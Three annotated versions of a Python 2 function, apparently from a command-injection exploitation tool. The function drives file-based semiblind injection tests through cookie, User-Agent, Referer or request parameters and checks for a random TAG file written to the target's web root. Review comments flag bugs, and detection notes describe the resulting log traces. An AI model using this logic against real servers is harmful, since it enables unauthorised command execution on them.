示例#1
def fb_injection_handler(url, delay, filename, http_request_method, url_time_response):
  """Drive the file-based semiblind command-injection check against `url`.

  For every prefix/suffix/separator combination from `settings`, a decision
  payload carrying a fresh random TAG is built by `fb_payloads`, sent through
  one of the `fb_injector` test helpers, and the location returned by
  `fb_injector.injection_output()` is then requested and searched for TAG.

  Parameters:
    url                 -- target URL; its path is also appended to
                           settings.SRV_ROOT_DIR.
    delay               -- seconds to sleep before requesting the output file
                           (also forwarded to injection_output()).
    filename            -- only forwarded to tfb_controller() and
                           delete_previous_shell() in the lines shown.
    http_request_method -- forwarded to fb_injector.injection_test().
    url_time_response   -- only forwarded to tfb_controller().

  Returns:
    True or False from the temporary-directory fallback prompt. No other
    return statement appears in the lines shown, so every other path falls
    off the loops (None), re-raises, or calls sys.exit(0).

  Side effects: mutates settings.SRV_ROOT_DIR, writes progress to stdout,
  may block on raw_input().

  Detection note: every attempt is followed by a request built around a file
  named with six random uppercase ASCII letters plus ".txt"; bursts of 404
  responses for such names are what this loop looks like in server logs.
  """

  # NOTE(review): counter, vp_flag, is_encoded, stop_injection,
  # export_injection_info and injection_type are never read in the lines
  # shown, and no_result is never reassigned there (it stays True).
  counter = 1
  failed_tries = 20
  vp_flag = True
  exit_loops = False
  no_result = True
  is_encoded= False
  stop_injection = False
  call_tmp_based = False
  export_injection_info = False

  injection_type = "Semiblind-based Command Injection"
  technique = "file-based semiblind injection technique"

  # Set temp path: the user-supplied option wins over the configured default.
  if menu.options.tmp_path:
    tmp_path = menu.options.tmp_path
  else:
    tmp_path = settings.TMP_PATH

  # A destination containing "/tmp/" switches straight to the tempfile-based
  # fallback on the first 404 (see the HTTPError handler below).
  if menu.options.file_dest and '/tmp/' in menu.options.file_dest:
    call_tmp_based = True
  else:
    if menu.options.srv_root_dir:
      settings.SRV_ROOT_DIR = menu.options.srv_root_dir
    else:
      # Debian/Ubuntu have been updated to use /var/www/html as default instead of /var/www.
      # NOTE(review): '"debian" or "ubuntu" in x' parses as
      # '"debian" or ("ubuntu" in x)', which is always truthy, so this branch
      # runs for every banner and the elif below is never reached.
      if "debian" or "ubuntu" in settings.SERVER_BANNER.lower():
        try:
          # Greedy match: captures everything between the first "/" and the
          # last "." of the banner.
          check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower())
          # NOTE(review): this is a lexicographic string comparison, not a
          # version comparison (e.g. "2.10" > "2.3" is False).
          if check_version[0] > "2.3":
            # Add "/html" to servers root directory
            settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html"
          else:
            # No-op self-assignment: the root directory is left unchanged.
            settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR
        except IndexError:
          # findall() found no version in the banner; keep the default.
          pass
      # Add "/html" to servers root directory
      elif "fedora" or "centos" in settings.SERVER_BANNER.lower():
        settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html"
      else:
        pass

      # Append the directory part of the URL path to the root directory.
      # The counting loop leaves count == len(path_parts) - 1, so last_param
      # is the final path segment.
      path = urlparse.urlparse(url).path
      path_parts = path.split('/')
      count = 0
      for part in path_parts:
        count = count + 1
      count = count - 1
      last_param = path_parts[count]
      # NOTE(review): str.replace() removes every occurrence of that segment
      # text from the path, not only the trailing one.
      EXTRA_DIR = path.replace(last_param, "")
      settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + EXTRA_DIR

    # Only printed when the tmp-based shortcut was not selected above.
    if not menu.options.verbose:
      print "(*) Trying to create a file on " + settings.SRV_ROOT_DIR + "... "
    else:
      print "(*) Testing the "+ technique + "... "

  i = 0
  # Calculate all possible combinations
  total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)

  # Check if defined alter shell
  alter_shell = menu.options.alter_shell

  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        # i counts attempts; it feeds the progress percentage and the
        # failed_tries threshold.
        i = i + 1

        # Change TAG on every request to prevent false-positive results.
        # The generator expression has its own scope, so its "i" does not
        # overwrite the attempt counter above.
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = TAG + ".txt"

        # Check for bad combination of prefix and separator
        # NOTE(review): rebinding the loop variable here keeps prefix == ""
        # for all remaining suffix/separator iterations of this outer pass.
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        try:
          # File-based decision payload (check if host is vulnerable).
          if alter_shell :
            payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
          else:
            payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)

          # Check if defined "--prefix" option.
          # Fix prefixes / suffixes
          payload = parameters.prefixes(payload, prefix)
          payload = parameters.suffixes(payload, suffix)

          # Optional base64 encoding of the whole payload.
          if menu.options.base64:
            payload = base64.b64encode(payload)

          # Check if defined "--verbose" option.
          if menu.options.verbose:
            print "(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + settings.SRV_ROOT_DIR + "..."
            print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL

          # Pick the request component that carries the payload. "response"
          # is assigned in every branch but not read in the lines shown.
          # Cookie Injection
          if settings.COOKIE_INJECTION == True:
            # Check if target host is vulnerable to cookie injection.
            vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
            response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)

          # User-Agent Injection
          elif settings.USER_AGENT_INJECTION == True:
            # Check if target host is vulnerable to user-agent injection.
            vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
            response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload)

          # Referer Injection
          elif settings.REFERER_INJECTION == True:
            # Check if target host is vulnerable to referer injection.
            vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
            response = fb_injector.referer_injection_test(url, vuln_parameter, payload)

          else:
            # Check if target host is vulnerable.
            response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)

          # Find the directory.
          # presumably injection_output() returns the URL of OUTPUT_TEXTFILE;
          # it is passed to urllib2.Request() below -- confirm in fb_injector.
          output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay)
          time.sleep(delay)

          try:
            # Check if defined extra headers.
            request = urllib2.Request(output)
            headers.do_check(request)

            # Evaluate test results.
            # "output" is rebound from the location to the response object.
            output = urllib2.urlopen(request)
            html_data = output.read()
            # TAG consists of uppercase letters only, so it is safe to use
            # as a regular expression without escaping.
            shell = re.findall(r"" + TAG + "", html_data)
            if len(shell) != 0 and not menu.options.verbose:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Testing the "+ technique + "... [ " + percent + " ]")
              sys.stdout.flush()

          except urllib2.HTTPError, e:
              # NOTE(review): status codes other than 404/401/403 fall
              # through this handler without any message.
              if e.getcode() == 404:
                # Integer percentage for the "== 100" test, one-decimal
                # string for display.
                percent = ((i*100)/total)
                float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))

                if call_tmp_based == True:
                  exit_loops = True
                  tmp_path = os.path.split(menu.options.file_dest)[0] + "/"
                  tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response)
                  # Bare raise re-raises the active exception. HTTPError
                  # subclasses URLError, so the outer URLError handler
                  # catches it (cleanup, then sys.exit(0)).
                  raise

                # Show an error message, after 20 failed tries.
                # Use the "/tmp/" directory for tempfile-based technique.
                elif i == failed_tries and no_result == True :
                  if not menu.options.verbose:
                    print ""
                  print Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to write on "+ settings.SRV_ROOT_DIR + "." + Style.RESET_ALL
                  # Re-prompt until a recognised answer is given.
                  while True:
                    tmp_upload = raw_input("(?) Do you want to try the temporary directory (" + tmp_path + ") [Y/n/q] > ").lower()
                    if tmp_upload in settings.CHOISE_YES:
                      exit_loops = True
                      call_tfb = tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response)
                      if call_tfb != False:
                        return True
                      else:
                        if no_result == True:
                          return False
                        else:
                          return True
                    elif tmp_upload in settings.CHOISE_NO:
                      break
                    elif tmp_upload in settings.CHOISE_QUIT:
                      print ""
                      # Same bare-raise path as above.
                      raise
                    else:
                      if tmp_upload == "":
                        tmp_upload = "enter"
                      print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL
                      pass
                  # Answer was "no": move on to the next separator.
                  continue

                else:
                  if exit_loops == False:
                    if not menu.options.verbose:
                      # The last combination shows FAILED instead of 100%
                      # while nothing has been found.
                      if percent == 100:
                        if no_result == True:
                          percent = Fore.RED + "FAILED" + Style.RESET_ALL
                        else:
                          percent = str(float_percent)+"%"
                      else:
                        percent = str(float_percent)+"%"

                      sys.stdout.write("\r(*) Testing the "+ technique + "... [ " + percent + " ]")
                      sys.stdout.flush()
                      continue
                    else:
                      continue
                  else:
                    raise

              # NOTE(review): both error exits below use status 0, which a
              # calling script cannot tell apart from success.
              elif e.getcode() == 401:
                print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n"
                sys.exit(0)

              elif e.getcode() == 403:
                print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n"
                sys.exit(0)

        except KeyboardInterrupt:
          # Delete previous shell (text) files (output)
          # NOTE(review): payload and vuln_parameter are first assigned
          # inside the try body; an interrupt before that point leaves them
          # unbound on the first pass (UnboundLocalError) or stale from the
          # previous pass afterwards.
          delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
          raise

        except urllib2.URLError, e:
          # print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL
          # Delete previous shell (text) files (output)
          # Also reached by the HTTPError re-raised from the inner handler.
          delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
          sys.exit(0)

        # Re-raises unchanged; equivalent to having no handler here.
        except:
          raise
示例#2
def fb_injection_handler(url, delay, filename, http_request_method,
                         url_time_response):
    """Drive the file-based semiblind command-injection check against `url`.

    For every prefix/suffix/separator combination from `settings`, a decision
    payload carrying a fresh random TAG is built by `fb_payloads`, sent
    through one of the `fb_injector` test helpers, and a URL derived from
    `url` (last "/"-separated segment replaced by the output file name) is
    then requested and searched for TAG.

    Parameters:
      url                 -- target URL, also the base of the output-file URL.
      delay               -- seconds to sleep before requesting the output
                             file.
      filename            -- only forwarded to tfb_controller() in the lines
                             shown.
      http_request_method -- forwarded to fb_injector.injection_test().
      url_time_response   -- only forwarded to tfb_controller().

    Returns:
      False from the temporary-directory fallback prompt. No other return
      statement appears in the lines shown, so every other path falls off
      the loops (None) or calls sys.exit(0).

    Side effects: writes progress to stdout, may block on raw_input().

    Detection note: every attempt is followed by a GET for a file named with
    six random uppercase ASCII letters plus ".txt" next to the tested page;
    bursts of 404 responses for such names are what this loop looks like in
    server logs.
    """

    # NOTE(review): counter, vp_flag, is_encoded, stop_injection,
    # export_injection_info and injection_type are never read in the lines
    # shown, and no_result is never reassigned there (it stays True).
    counter = 1
    failed_tries = 20
    vp_flag = True
    exit_loops = False
    no_result = True
    is_encoded = False
    stop_injection = False
    call_tmp_based = False
    export_injection_info = False

    injection_type = "Semiblind-based Command Injection"
    technique = "file-based semiblind injection technique"

    # Set temp path: the user-supplied option wins over the configured default.
    if menu.options.tmp_path:
        tmp_path = menu.options.tmp_path
    else:
        tmp_path = settings.TMP_PATH

    print "(*) Testing the " + technique + "... "

    # SRV_ROOT_DIR is only used in progress and warning messages below.
    # A destination containing "/tmp/" switches straight to the
    # tempfile-based fallback on the first 404.
    if menu.options.file_dest:
        if '/tmp/' in menu.options.file_dest:
            call_tmp_based = True
        SRV_ROOT_DIR = os.path.split(menu.options.file_dest)[0]
    else:
        if menu.options.srv_root_dir:
            SRV_ROOT_DIR = menu.options.srv_root_dir
        else:
            SRV_ROOT_DIR = settings.SRV_ROOT_DIR

    i = 0
    # Calculate all possible combinations
    total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(
        settings.SUFFIXES)

    # Check if defined alter shell
    alter_shell = menu.options.alter_shell

    for prefix in settings.PREFIXES:
        for suffix in settings.SUFFIXES:
            for separator in settings.SEPARATORS:
                # i counts attempts; it feeds the progress percentage and
                # the failed_tries threshold.
                i = i + 1

                # Change TAG on every request to prevent false-positive results.
                # The generator expression has its own scope, so its "i"
                # does not overwrite the attempt counter above.
                TAG = ''.join(
                    random.choice(string.ascii_uppercase) for i in range(6))

                # The output file for file-based injection technique.
                OUTPUT_TEXTFILE = TAG + ".txt"

                # Check for bad combination of prefix and separator
                # NOTE(review): rebinding the loop variable here keeps
                # prefix == "" for all remaining suffix/separator
                # iterations of this outer pass.
                combination = prefix + separator
                if combination in settings.JUNK_COMBINATION:
                    prefix = ""

                try:
                    # File-based decision payload (check if host is vulnerable).
                    if alter_shell:
                        payload = fb_payloads.decision_alter_shell(
                            separator, TAG, OUTPUT_TEXTFILE)
                    else:
                        payload = fb_payloads.decision(separator, TAG,
                                                       OUTPUT_TEXTFILE)

                    # Check if defined "--prefix" option.
                    # Fix prefixes / suffixes
                    payload = parameters.prefixes(payload, prefix)
                    payload = parameters.suffixes(payload, suffix)

                    # Check if defined "--verbose" option.
                    if menu.options.verbose:
                        print Fore.GREY + "(~) Payload: " + payload.replace(
                            "\n", "\\n") + Style.RESET_ALL

                    # Pick the request component that carries the payload.
                    # "response" is assigned in every branch but not read
                    # in the lines shown.
                    # Cookie Injection
                    if settings.COOKIE_INJECTION == True:
                        # Check if target host is vulnerable to cookie injection.
                        vuln_parameter = parameters.specify_cookie_parameter(
                            menu.options.cookie)
                        response = fb_injector.cookie_injection_test(
                            url, vuln_parameter, payload)

                    # User-Agent Injection
                    elif settings.USER_AGENT_INJECTION == True:
                        # Check if target host is vulnerable to user-agent injection.
                        vuln_parameter = parameters.specify_user_agent_parameter(
                            menu.options.agent)
                        response = fb_injector.user_agent_injection_test(
                            url, vuln_parameter, payload)

                    # Referer Injection
                    elif settings.REFERER_INJECTION == True:
                        # Check if target host is vulnerable to referer injection.
                        vuln_parameter = parameters.specify_referer_parameter(
                            menu.options.referer)
                        response = fb_injector.referer_injection_test(
                            url, vuln_parameter, payload)

                    else:
                        # Check if target host is vulnerable.
                        response, vuln_parameter = fb_injector.injection_test(
                            payload, http_request_method, url)

                    # Find the directory.
                    # The counting loop leaves count == len(path_parts) - 1,
                    # so last_param is the text after the final "/" of the
                    # whole URL (query string included, if any).
                    path = url
                    path_parts = path.split('/')
                    count = 0
                    for part in path_parts:
                        count = count + 1
                    count = count - 1
                    last_param = path_parts[count]
                    # NOTE(review): str.replace() substitutes every
                    # occurrence of that text in the URL; when the URL ends
                    # with "/", last_param is "" and the file name is
                    # inserted between every character.
                    output = url.replace(last_param, OUTPUT_TEXTFILE)
                    time.sleep(delay)

                    try:
                        # Check if defined extra headers.
                        request = urllib2.Request(output)
                        headers.do_check(request)

                        # Evaluate test results.
                        # "output" is rebound from the URL string to the
                        # response object.
                        output = urllib2.urlopen(request)
                        html_data = output.read()
                        # TAG consists of uppercase letters only, so it is
                        # safe to use as a regular expression unescaped.
                        shell = re.findall(r"" + TAG + "", html_data)
                        if len(shell) != 0 and not menu.options.verbose:
                            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                            sys.stdout.write("\r(*) Trying to upload the '" +
                                             OUTPUT_TEXTFILE + "' on " +
                                             SRV_ROOT_DIR + "... [ " +
                                             percent + " ]")
                            sys.stdout.flush()

                    except urllib2.HTTPError, e:
                        # NOTE(review): status codes other than 404/401/403
                        # fall through this handler without any message.
                        if e.getcode() == 404:
                            # Integer division under Python 2.
                            percent = ((i * 100) / total)
                            if call_tmp_based == True:
                                exit_loops = True
                                tmp_path = os.path.split(
                                    menu.options.file_dest)[0] + "/"
                                tfb_controller(no_result, url, delay, filename,
                                               tmp_path, http_request_method,
                                               url_time_response)
                                # Bare raise re-raises the active exception.
                                # HTTPError subclasses URLError, so the outer
                                # URLError handler catches it and exits.
                                raise

                            # Show an error message, after 20 failed tries.
                            # Use the "/tmp/" directory for tempfile-based technique.
                            elif i == failed_tries:
                                if not menu.options.verbose:
                                    print ""
                                print Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to write on " + SRV_ROOT_DIR + "." + Style.RESET_ALL
                                # Re-prompt until a recognised answer is given.
                                while True:
                                    tmp_upload = raw_input(
                                        "(?) Do you want to try the temporary directory ("
                                        + tmp_path + ") [Y/n] > ").lower()
                                    if tmp_upload in settings.CHOISE_YES:
                                        exit_loops = True
                                        tfb_controller(no_result, url, delay,
                                                       filename, tmp_path,
                                                       http_request_method,
                                                       url_time_response)
                                        # NOTE(review): tfb_controller()'s
                                        # result is discarded; no_result is
                                        # still True here, so this returns
                                        # False.
                                        if no_result == True:
                                            return False
                                    elif tmp_upload in settings.CHOISE_NO:
                                        break
                                    else:
                                        if tmp_upload == "":
                                            tmp_upload = "enter"
                                        print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL
                                        pass
                                # Answer was "no": move on to the next
                                # separator.
                                continue

                            else:
                                if exit_loops == False:
                                    if not menu.options.verbose:
                                        # The last combination shows FAILED
                                        # instead of 100% while nothing has
                                        # been found.
                                        if percent == 100:
                                            if no_result == True:
                                                percent = Fore.RED + "FAILED" + Style.RESET_ALL
                                            else:
                                                percent = str(percent) + "%"
                                        else:
                                            percent = str(percent) + "%"
                                        sys.stdout.write(
                                            "\r(*) Trying to upload the '" +
                                            OUTPUT_TEXTFILE + "' on " +
                                            SRV_ROOT_DIR + "... [ " + percent +
                                            " ]")
                                        sys.stdout.flush()
                                        continue
                                    else:
                                        continue
                                else:
                                    raise

                        # NOTE(review): sys.exit() raises SystemExit inside
                        # the outer try body, and the bare "except: continue"
                        # at the end of that try catches it, so these two
                        # exits do not stop the loop.
                        elif e.getcode() == 401:
                            print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n"
                            sys.exit(0)

                        elif e.getcode() == 403:
                            print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n"
                            sys.exit(0)

                except KeyboardInterrupt:
                    # Delete previous shell (text) files (output)
                    # NOTE(review): payload and vuln_parameter are first
                    # assigned inside the try body; an interrupt before that
                    # point leaves them unbound on the first pass
                    # (UnboundLocalError) or stale from the previous pass.
                    delete_previous_shell(separator, payload, TAG, prefix,
                                          suffix, http_request_method, url,
                                          vuln_parameter, OUTPUT_TEXTFILE,
                                          alter_shell)
                    raise

                except urllib2.URLError, e:
                    #print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL
                    # Also reached by the HTTPError re-raised from the inner
                    # handler. Exits with status 0 and, unlike the
                    # KeyboardInterrupt path, without calling
                    # delete_previous_shell().
                    sys.exit(0)

                # NOTE(review): a bare except swallows every other exception
                # (programming errors and SystemExit included) and silently
                # moves to the next combination.
                except:
                    continue
示例#3
def fb_injection_handler(url, delay, filename, http_request_method):
  """Drive the file-based semiblind command-injection check against `url`.

  For every prefix/suffix/separator combination from `settings`, a decision
  payload carrying a fresh random TAG is built by `fb_payloads`, sent through
  `fb_injector` (cookie or regular request), and a URL derived from `url`
  (last "/"-separated segment replaced by the output file name) is then
  requested and searched for TAG.

  Parameters:
    url                 -- target URL, also the base of the output-file URL.
    delay               -- seconds to sleep before requesting the output file.
    filename            -- only forwarded to tfb_controller() in the lines
                           shown.
    http_request_method -- forwarded to fb_injector.injection_test().

  Returns:
    False from the temporary-directory fallback prompt. No other return
    statement appears in the lines shown, so every other path falls off the
    loops (None) or calls sys.exit(0).

  Side effects: writes progress to stdout, may block on raw_input().

  Detection note: every attempt is followed by a GET for a file named with
  six random uppercase ASCII letters plus ".txt" next to the tested page;
  bursts of 404 responses for such names are what this loop looks like in
  server logs.
  """

  # NOTE(review): counter, vp_flag, is_encoded, stop_injection,
  # export_injection_info and injection_type are never read in the lines
  # shown, and no_result is never reassigned there (it stays True).
  counter = 1
  vp_flag = True
  exit_loops = False
  no_result = True
  is_encoded= False
  stop_injection = False
  call_tmp_based = False
  export_injection_info = False
  injection_type = "Semiblind-based Command Injection"
  technique = "file-based semiblind injection technique"

  # Set temp path: the user-supplied option wins over the configured default.
  if menu.options.tmp_path:
    tmp_path = menu.options.tmp_path
  else:
    tmp_path = settings.TMP_PATH

  print "(*) Testing the "+ technique + "... "

  # SRV_ROOT_DIR is only used in progress and error messages below.
  # A destination containing "/tmp/" switches straight to the tempfile-based
  # fallback on the first 404.
  if menu.options.file_dest:
    if '/tmp/' in menu.options.file_dest:
      call_tmp_based = True
    SRV_ROOT_DIR = os.path.split(menu.options.file_dest)[0]
  else:
    if menu.options.srv_root_dir:
      SRV_ROOT_DIR = menu.options.srv_root_dir
    else:
      SRV_ROOT_DIR = settings.SRV_ROOT_DIR

  i = 0
  # Calculate all possible combinations
  total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)

  # Check if defined alter shell
  alter_shell = menu.options.alter_shell

  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        # i counts attempts; it feeds the progress percentage and the
        # 20-attempt threshold below.
        i = i + 1

        # Change TAG on every request to prevent false-positive results.
        # The generator expression has its own scope, so its "i" does not
        # overwrite the attempt counter above.
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = TAG + ".txt"

        # Check for bad combination of prefix and separator
        # NOTE(review): rebinding the loop variable here keeps prefix == ""
        # for all remaining suffix/separator iterations of this outer pass.
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        try:
          # File-based decision payload (check if host is vulnerable).
          if alter_shell :
            payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
          else:
            payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)

          # Check if defined "--prefix" option.
          # Fix prefixes / suffixes
          payload = parameters.prefixes(payload, prefix)
          payload = parameters.suffixes(payload, suffix)

          # Check if defined "--verbose" option.
          if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

          # "response" is assigned in both branches but not read in the
          # lines shown.
          # Cookie Injection
          if settings.COOKIE_INJECTION == True:
            # Check if target host is vulnerable to cookie injection.
            vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
            response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
          else:
            # Check if target host is vulnerable.
            response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)

          # Find the directory.
          # The counting loop leaves count == len(path_parts) - 1, so
          # last_param is the text after the final "/" of the whole URL
          # (query string included, if any).
          path = url
          path_parts = path.split('/')
          count = 0
          for part in path_parts:
            count = count + 1
          count = count - 1
          last_param = path_parts[count]
          # NOTE(review): str.replace() substitutes every occurrence of that
          # text in the URL; when the URL ends with "/", last_param is ""
          # and the file name is inserted between every character.
          output = url.replace(last_param, OUTPUT_TEXTFILE)
          time.sleep(delay)

          try:
            # Check if defined extra headers.
            request = urllib2.Request(output)
            headers.do_check(request)

            # Evaluate test results.
            # "output" is rebound from the URL string to the response object.
            output = urllib2.urlopen(request)
            html_data = output.read()
            # TAG consists of uppercase letters only, so it is safe to use
            # as a regular expression without escaping.
            shell = re.findall(r"" + TAG + "", html_data)
            if len(shell) != 0 and not menu.options.verbose:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + SRV_ROOT_DIR + "... [ " + percent + " ]")
              sys.stdout.flush()

          except urllib2.HTTPError, e:
              # NOTE(review): status codes other than 404/401/403 fall
              # through this handler without any message.
              if e.getcode() == 404:
                # Integer division under Python 2.
                percent = ((i*100)/total)
                if call_tmp_based == True:
                  exit_loops = True
                  tmp_path = os.path.split(menu.options.file_dest)[0] + "/"
                  tfb_controller(no_result, url, delay, tmp_path, filename, http_request_method)
                  # Bare raise re-raises the active exception. HTTPError
                  # subclasses URLError, so the outer URLError handler
                  # catches it and exits.
                  raise
                # Show an error message, after 20 failed tries.
                # Use the "/tmp/" directory for tempfile-based technique.
                elif i == 20 :
                  print "\n" + Back.RED + "(x) Error: It seems that you don't have permissions to write on "+ SRV_ROOT_DIR + "." + Style.RESET_ALL
                  # Re-prompt until a recognised answer is given.
                  while True:
                    tmp_upload = raw_input("(?) Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > ").lower()
                    if tmp_upload in settings.CHOISE_YES:
                      exit_loops = True
                      tfb_controller(no_result, url, delay, tmp_path, filename, http_request_method)
                      # NOTE(review): tfb_controller()'s result is
                      # discarded; no_result is still True here, so this
                      # returns False.
                      if no_result == True:
                        return False
                    elif tmp_upload in settings.CHOISE_NO:
                      break
                    else:
                      if tmp_upload == "":
                        tmp_upload = "enter"
                      print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL
                      pass
                  # Answer was "no": move on to the next separator.
                  continue

                else:
                  if exit_loops == False:
                    if not menu.options.verbose:
                      # The last combination shows FAILED instead of 100%
                      # while nothing has been found.
                      if percent == 100:
                        if no_result == True:
                          percent = Fore.RED + "FAILED" + Style.RESET_ALL
                        else:
                          percent = str(percent)+"%"
                      else:
                        percent = str(percent)+"%"
                      sys.stdout.write("\r(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + SRV_ROOT_DIR + "... [ " + percent + " ]")
                      sys.stdout.flush()
                      continue
                    else:
                      continue
                  else:
                    raise

              # NOTE(review): sys.exit() raises SystemExit inside the outer
              # try body, and the bare "except: continue" at the end of that
              # try catches it, so these two exits do not stop the loop.
              elif e.getcode() == 401:
                print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n"
                sys.exit(0)

              elif e.getcode() == 403:
                print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n"
                sys.exit(0)

        except KeyboardInterrupt:
          # Remove the test output file before propagating the interrupt.
          # NOTE(review): payload and vuln_parameter are first assigned
          # inside the try body; an interrupt before that point leaves them
          # unbound on the first pass (UnboundLocalError) or stale from the
          # previous pass afterwards.
          delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
          raise

        except urllib2.URLError, e:
          #print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL
          # Also reached by the HTTPError re-raised from the inner handler.
          # Exits with status 0 and, unlike the KeyboardInterrupt path,
          # without calling delete_previous_shell().
          sys.exit(0)

        # NOTE(review): a bare except swallows every other exception
        # (programming errors and SystemExit included) and silently moves to
        # the next combination.
        except:
          continue